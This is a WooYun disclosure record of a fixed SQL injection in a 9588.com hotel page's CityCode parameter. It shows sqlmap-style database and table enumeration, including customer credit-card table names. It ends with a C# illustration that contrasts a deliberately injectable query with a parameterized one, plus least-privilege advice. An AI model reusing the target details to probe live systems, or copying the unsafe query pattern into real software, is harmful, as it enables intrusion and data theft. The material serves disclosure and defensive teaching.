Vulnerability summary
Defect ID: wooyun-2015-0109286
Vulnerability title: Injection on a 9588 site
Affected vendor: 9588.com
Author: XXXQQ
Submitted: 2015-04-21 11:20
Fixed: 2015-05-20 09:40
Published: 2015-05-20 09:40
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Fixed by the vendor
Source: http://www.wooyun.org; for questions or assistance contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-04-21: Details sent to the vendor, awaiting vendor handling
2015-04-24: Vendor confirmed; details visible only to the vendor
2015-05-04: Details disclosed to core white hats and relevant domain experts
2015-05-14: Details disclosed to ordinary white hats
2015-05-20: Vendor fixed the vulnerability and chose to publish; details disclosed to the public
Brief description:
DBA-level SQL injection
Detailed description:
http://coope.9588.com/hotel/hotel/brandhtml?CityCode=CGQ&random=10000
Parameter: CityCode
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'TravelHotel'
current user: 'TravelHotel'
current user is DBA: True
available databases [10]:
[*] ATS
[*] DatabaseManage
[*] master
[*] model
[*] msdb
[*] NFD_TZ
[*] tablebackup
[*] tempdb
[*] TravelFterm
[*] TravelHotel
Database: TravelHotel
[88 tables]
+----------------------------------+
| ACL_Fun |
| ACL_User |
| ACL_UserFun |
| ACL_UserNickName |
| ACL_Usergroup |
| ACL_UsergroupFun |
| ACL_UsergroupUser |
| CRM_Customer |
| CRM_Customer_CreditCard |
| CRM_Customer_WhiteAndBlack |
| CRM_Order |
| CUP_AdvancePaiedPrice_History |
| HO_Balance_Month |
| HO_Base_Agency |
| HO_Base_Agency_Commission |
| HO_Base_Brand |
| HO_Base_City |
| HO_Base_CreditCard |
| HO_Base_District |
| HO_Base_FeaturedAmenity |
| HO_Base_Mark |
| HO_Base_Provider |
| HO_Base_ProviderCity |
| HO_Base_ProviderDistrict |
| HO_Base_Province |
| HO_EnHotel |
| HO_EnHotel_Guarantee |
| HO_EnHotel_Policy |
| HO_EnHotel_RoomPriceType |
| HO_EnHotel_RoomType |
| HO_EnHotel_Traffic |
| HO_Hotel |
| HO_Hotel_AutoUpdateConfirm |
| HO_Hotel_CityPriceRange |
| HO_Hotel_DictionaryData |
| HO_Hotel_Evaluation |
| HO_Hotel_FeaturedAmenity |
| HO_Hotel_Guarantee |
| HO_Hotel_Mark |
| HO_Hotel_MinPrice |
| HO_Hotel_NearHotel |
| HO_Hotel_Photo |
| HO_Hotel_Policy |
| HO_Hotel_ProviderHotel |
| HO_Hotel_ProviderRoomType |
| HO_Hotel_QuestionAnswer |
| HO_Hotel_RoomPrice |
| HO_Hotel_RoomPriceType |
| HO_Hotel_RoomPrice_History |
| HO_Hotel_RoomPrice_History_Month |
| HO_Hotel_RoomStatus |
| HO_Hotel_RoomType |
| HO_Hotel_RoomTypeModel |
| HO_Hotel_ServiceFacilities |
| HO_Hotel_Traffic |
| HO_Order |
| HO_Order_AgencyOrder |
| HO_Order_Audit |
| HO_Order_ProviderOrder |
| HO_Order_Task |
| HO_Provider_AccountTrack |
| HO_Provider_AccountTrackLog |
| SYS_BusinessLog |
| SYS_CUF1 |
| SYS_CUF2 |
| SYS_Dictionary |
| SYS_DistDBRule |
| SYS_DistIISRule |
| SYS_GlobalConfig |
| SYS_IDCreater |
| SYS_Log |
| T_HO_Hotel |
| T_HO_Hotel2 |
| T_LowPrice |
| Temp_Date |
| Temp_Hotel_Jielv |
| Temp_Hotel_JielvInOur |
| VIEW_ACLUser |
| VIEW_ACLUserGroup |
| View_HO_Base_CityACL |
| View_HO_Base_FeaturedAmenityACL |
| View_HO_Order_AuditofACL |
| View_HO_Order_TaskofACL |
| View_HO_OrderofACL |
| View_Ho_Base_DistrictACL |
| sysdiagrams |
| vHO_Hotel_RoomPrice |
| vHotelMinPrice |
+----------------------------------+
Didn't go any further.
Proof of vulnerability:
Fix recommendation:
Injection
Copyright notice: please credit XXXQQ@WooYun when reposting.
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-04-24 14:23
Vendor reply:
Thanks for the heads-up.
Latest status:
2015-05-20: Vulnerability fixed.
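The report's fix note is a single word, and the sqlmap output above shows what went wrong: the `CityCode` query-string parameter reaches a SQL Server 2005 query unescaped, and the application logs in with a DBA account. The following is an added illustration, not code from 9588.com or from the report author, of a hypothetical ASP.NET/C# lookup written both ways: the unsafe string-splicing form and the parameterized form a defender would ship. The table name `HO_Base_Brand` is taken from the schema dump in the report; its column names, the connection string and the class and method names are assumptions.

```csharp
// Added example (not 9588.com's code): hotel-brand lookup by city code,
// first as an injectable query, then hardened with input validation and a
// typed SQL parameter. Column names and the connection string are assumed.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class BrandLookup
{
    // Assumed connection string; the real one is not on the page.
    private const string ConnectionString =
        "Server=(local);Database=TravelHotel;Integrated Security=true";

    // VULNERABLE: the request value is concatenated into the statement, so a
    // quote or comment sequence in CityCode rewrites the query. Because the
    // application login is DBA (see "current user is DBA: True"), the
    // rewritten query runs with full control of the SQL Server instance.
    public static List<string> GetBrandsUnsafe(string cityCode)
    {
        string sql = "SELECT BrandName FROM HO_Base_Brand WHERE CityCode = '"
                     + cityCode + "'";
        var brands = new List<string>();
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                    brands.Add(reader.GetString(0));
            }
        }
        return brands;
    }

    // HARDENED: reject anything that is not a city code, then bind the value
    // as a typed parameter so it can never be parsed as SQL.
    public static List<string> GetBrandsSafe(string cityCode)
    {
        // The site uses three-letter city codes (CGQ in the report URL);
        // anything else is refused before the database is touched.
        if (cityCode == null || !Regex.IsMatch(cityCode, "^[A-Z]{3}$"))
            throw new ArgumentException("invalid CityCode");

        var brands = new List<string>();
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(
            "SELECT BrandName FROM HO_Base_Brand WHERE CityCode = @CityCode", conn))
        {
            // Typed, length-limited parameter: the value travels as data,
            // separate from the statement text.
            cmd.Parameters.Add("@CityCode", SqlDbType.NVarChar, 3).Value = cityCode;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                    brands.Add(reader.GetString(0));
            }
        }
        return brands;
    }
}
```

The query fix removes the injection; the privilege finding is a second, independent defect. sqlmap's "current user is DBA: True" means the `TravelHotel` login the web tier connects with holds the sysadmin server role, so every query the site runs, injected or not, has the authority to read the other nine databases, alter logins and reach the host. The application login should instead be an ordinary database user granted only the database roles the site needs (for example `db_datareader` and `db_datawriter` on `TravelHotel`), which limits what any future injection can reach even if the parameterization is missed somewhere.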